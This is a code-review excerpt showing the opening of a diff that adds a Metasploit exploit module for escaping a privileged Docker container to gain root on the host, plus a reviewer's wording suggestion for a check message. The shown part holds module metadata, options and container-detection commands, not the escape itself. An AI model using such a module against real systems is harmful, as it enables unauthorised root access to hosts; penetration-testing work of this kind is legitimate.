modules/exploits/linux/local/docker_privileged_container_escape.rb

```diff
@@ -0,0 +1,159 @@
+##
+
+# POC modified from https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/
+class MetasploitModule < Msf::Exploit::Local
+  Rank = NormalRanking
+
+  include Msf::Post::File
+  include Msf::Post::Linux::Priv
+  include Msf::Post::Linux::System
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(
+        update_info(
+            info,
+            {
+                'Name' => 'Docker Privileged Container Escape',
+                'Description' => %q{
+              This module escapes from a privileged Docker container and obtains root on the host machine by abusing the Linux cgroup notification on release
+              feature. This exploit should work against any container started with the following flags: `--cap-add=SYS_ADMIN`, `--privileged`.
+            },
+                'License' => MSF_LICENSE,
+                'Author' => ['stealthcopter'],
+                'Platform' => 'linux',
+                'Arch' => [ARCH_X86, ARCH_X64, ARCH_ARMLE, ARCH_MIPSLE, ARCH_MIPSBE],
+                'Targets' => [['Automatic', {}]],
+                'DefaultOptions' => { 'PrependFork' => true, 'WfsDelay' => 20 },
+                'SessionTypes' => ['shell', 'meterpreter'],
+                'DefaultTarget' => 0,
+                'References' => [
+                    ['EDB', '47147'],
+                    ['URL', 'https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/'],
+                    ['URL', 'https://github.com/stealthcopter/deepce']
+                ],
+                'DisclosureDate' => 'Jul 17 2019' # Felix Wilhelm @_fel1x first mentioned on twitter Felix Wilhelm
+            }
+        )
+    )
+    register_advanced_options(
+        [
+            OptBool.new('ForceExploit', [false, 'Override check result', false]),
+            OptBool.new('ForcePayloadSearch', [false, 'Search for payload on the file system rather than copying it from container', false]),
+            OptString.new('WritableContainerDir', [true, 'A directory where we can write files in the container', '/tmp']),
+            OptString.new('WritableHostDir', [true, 'A directory where we can write files inside on the host', '/tmp']),
+        ]
+    )
+  end
+
+  def base_dir_container
+    datastore['WritableContainerDir'].to_s
+  end
+
+  def base_dir_host
+    datastore['WritableHostDir'].to_s
+  end
+
+  # Get the container id and check it's the expected 64 char hex string, otherwise return nil
+  def container_id
+    id = cmd_exec('basename $(cat /proc/1/cpuset)').chomp
+    unless id.match(/\A[\h]{64}\z/).nil?
+      id
+    end
+  end
+
+  # Check we have all the prerequisites to perform the escape
+  def check
+    # are in a docker container
+    unless cmd_exec('test -f /.dockerenv && echo true') =~ /true$/
+      return Exploit::CheckCode::Safe('Not inside a Docker container, use ForceExploit to override')
```

Comment:
`use ForceExploit to override` is implied. It is also printed when the `AutoCheck` mixin is used.

```suggestion
      return CheckCode::Safe('Not inside a Docker container')
```